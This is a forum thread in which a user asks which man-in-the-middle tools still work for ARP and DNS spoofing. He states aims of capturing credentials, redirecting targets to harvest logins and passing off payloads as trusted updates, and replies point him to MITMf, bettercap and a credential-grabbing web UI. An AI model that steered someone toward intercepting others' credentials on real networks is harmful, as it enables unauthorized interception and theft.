What MITM tools still work? ARP and DNS spoofing?

[vailixi]

I had this prettty nifty tool called Suberfuge a while back. It has a pretty nifty web interface and a cool code injection module that you can use metsploit. The problem is it doesn't seem to work anymore. There were some tools like hamster, ferret, ettercap, and firesheep that did this a while back. I'm not sure if any of those are really working. I tried messing around with ettercap but I got a lot of errors. Not sure if I have etter.conf correct. Anybody still using ettercap?

I know there had been some improvements to SSL that rendered SSL strips non-functional. Then SSL split came about as a replacement. I'm not really sure how a lot of newer MITM stuff works. I'm also not really up on the technical aspect of ip forwarding and whatnot. But I'm serious about learning it.

Anybody want to talk me point me in the way of some still working tutorials or talk through some attacks?

What I'm curious about:

Capturing credentials

spoofing DNS and directing people to websites to harvest credentials

Spoofing so the target machine thinks my payload is an update or something else trusted.

Any of you guys doing this on the regular these days?

[IvanDoe]

Try ​https://github.com/byt3bl33d3r/MITMf

or https://github.com/evilsocket/bettercap

​

​I have tried both, mitmf has alot of plugins, i even made a web ui for mitmf that collects data via xss/php/mysql > https://github.com/ivangr0zni/mitm-grabb3r

Edited September 17, 2015 by IvanDoe

[digip]

Hamter and Ferret, as well as Cain still work on the windows side. Linux, same, as well as many other tools, although you have a lot of them to choose from compared to windows. It's a matter of targets, wireless usually being the easier to attack, while wired, almost always gets hosed up quicker if not right away depending on the equipment. You can somewhat defeat arp attacks and hang the network in the process if you use static entries everywhere on the lan though, and depending on the setup, even when correctly spoofed, sticky ports on equipment can thwart you if the device sees the same mac address on more than one port, it will only honor the first known port and block the second one. This is why wireless arp spoofing attacks work so well since there are no real checks other than nodes using static entries for arp.

[barry99705]

Hamter and Ferret, as well as Cain still work on the windows side. Linux, same, as well as many other tools, although you have a lot of them to choose from compared to windows. It's a matter of targets, wireless usually being the easier to attack, while wired, almost always gets hosed up quicker if not right away depending on the equipment. You can somewhat defeat arp attacks and hang the network in the process if you use static entries everywhere on the lan though, and depending on the setup, even when correctly spoofed, sticky ports on equipment can thwart you if the device sees the same mac address on more than one port, it will only honor the first known port and block the second one. This is why wireless arp spoofing attacks work so well since there are no real checks other than nodes using static entries for arp.

The stuff of nightmares.

[vailixi]

Try ​https://github.com/byt3bl33d3r/MITMf

or https://github.com/evilsocket/bettercap

​

​I have tried both, mitmf has alot of plugins, i even made a web ui for mitmf that collects data via xss/php/mysql > https://github.com/ivangr0zni/mitm-grabb3r

Trying out some of these. bettercap seems to be working just fine. Where does the -X option write the captured data to?

[digip]

Trying out some of these. bettercap seems to be working just fine. Where does the -X option write the captured data to?

Look in the source? if not specificed, most likely the same directory as the script, although you can try using a path to a file instead.

-O is output from what this looks like, but can set a pcap file path as well. haven't tried it or use the tool yet, just looking at:

​

https://github.com/evilsocket/bettercap/blob/master/bin/bettercap